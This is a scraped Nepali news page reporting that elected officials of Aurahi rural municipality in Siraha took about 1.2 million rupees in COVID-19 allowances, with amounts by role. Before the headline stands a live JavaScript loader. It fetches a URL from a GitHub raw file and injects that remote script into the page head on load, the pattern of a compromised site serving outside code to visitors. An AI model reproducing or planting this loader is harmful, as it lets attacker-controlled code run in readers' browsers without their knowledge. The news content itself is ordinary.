;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोना संकटमा खटेबापत जनप्रतिनिधिले लिए १२ लाख भत्ता – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोरोना संकटमा खटेबापत जनप्रतिनिधिले लिए १२ लाख भत्ता
जुनेली बिशेष

कोरोना संकटमा खटेबापत जनप्रतिनिधिले लिए १२ लाख भत्ता

भदौ ०१

सिरहा । जिल्लाको औरही गाउँपालिकाका जनप्रतिनिधिले कोभिड– १९ संकटमा खटेबापत ११ लाख ९६ हजार रुपैयाँ भत्ता लिएका छन् । गाउँपालिकामा २९ सदस्यीय सभा र १३ सदस्यीय कार्यपालिका छ । सभा सदस्यहरूलाई जनही १७ हजार, कार्यपालिका सदस्यहरूलाई २५ हजार, वडाध्यक्षहरूलाई ५० हजार, उपाध्यक्षलाई ८५ हजार र अध्यक्षलाई करिब एक लाख रुपैयाँ वितरण गरिएको छ ।

यस्तै, स्वास्थ्यकर्मीहरूलाई आठ लाख र गाउँपालिका कर्मचारीलाई दुई लाख ९४ हजार रुपैयाँ बाँडिएको छ । गाउँपालिकाले कार्यविधि बनाएर जोखिम भत्ता उपलब्ध गराएको निमित्त प्रशासकीय अधिकृत लक्ष्मण साहले बताए ।

सिराहा नगरपालिकाले तन्ना र सिरक खरिदमा गरेको खर्चबारे चर्चा सेलाउन नपाउँदै औरही गाउँपालिकामा जनप्रतिनिधिलाई भत्ता वितरण गरिएको सार्वजनिक भएको हो । जिल्ला प्रशासन कार्यालयले शुक्रबार औरही गाउँपालिकाको खर्च विवरण सार्वजनिक गरेको थियो । -नयाँ पत्रिका दैनिकबाट/ फोटो 

फेसबुक प्रतिक्रियाहरु